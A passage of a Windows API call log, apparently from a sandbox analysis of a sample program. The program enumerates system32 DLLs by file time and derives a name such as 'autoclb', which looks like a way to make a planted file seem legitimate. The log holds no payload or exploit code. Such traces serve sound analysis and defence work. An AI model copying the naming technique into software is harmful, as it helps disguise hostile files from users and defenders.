[0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.356] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.356] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.357] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.357] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] StrChrA (lpStart="clb.dll", wMatch=0x2e) returned=".dll" [0055.358] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.358] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.358] FindClose (in: hFindFile=0x63e6c8 | out: hFindFile=0x63e6c8) returned 1 [0055.359] lstrlenA (lpString="autoclb") returned 7 [0055.359] mbstowcs (in: _Dest=0x2358710, _Source="autoclb", _MaxCount=0xe | out: _Dest="autoclb") returned 0x7 [0055.359] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x20 [0055.359] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x2358750, nSize=0x20 | out: lpDst="C:\\Windows\\system32\\c_1252.nls") returned 0x1f [0055.359] CreateFileA (lpFileName="C:\\Windows\\system32\\c_1252.nls" (normalized: "c:\\windows\\system32\\c_1252.nls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0055.359] GetFileTime (in: hFile=0x178, lpCreationTime=0x1f4feac, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x1f4feac*(dwLowDateTime=0x9656d311, dwHighDateTime=0x1d0baff), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0055.359] CloseHandle (hObject=0x178) returned 1 [0055.359] StrRChrA (lpStart="C:\\Windows\\system32\\c_1252.nls", lpEnd=0x0, wMatch=0x5c) returned="\\c_1252.nls" [0055.359] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\*.dll" | out: lpString1="C:\\Windows\\system32\\*.dll") returned="C:\\Windows\\system32\\*.dll" [0055.359] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\*.dll", lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 0x63e648 [0055.359] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.359] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.360] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.360] StrChrA (lpStart="adsldpc.dll", wMatch=0x2e) returned=".dll" [0055.360] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.361] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.361] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.362] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.362] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: 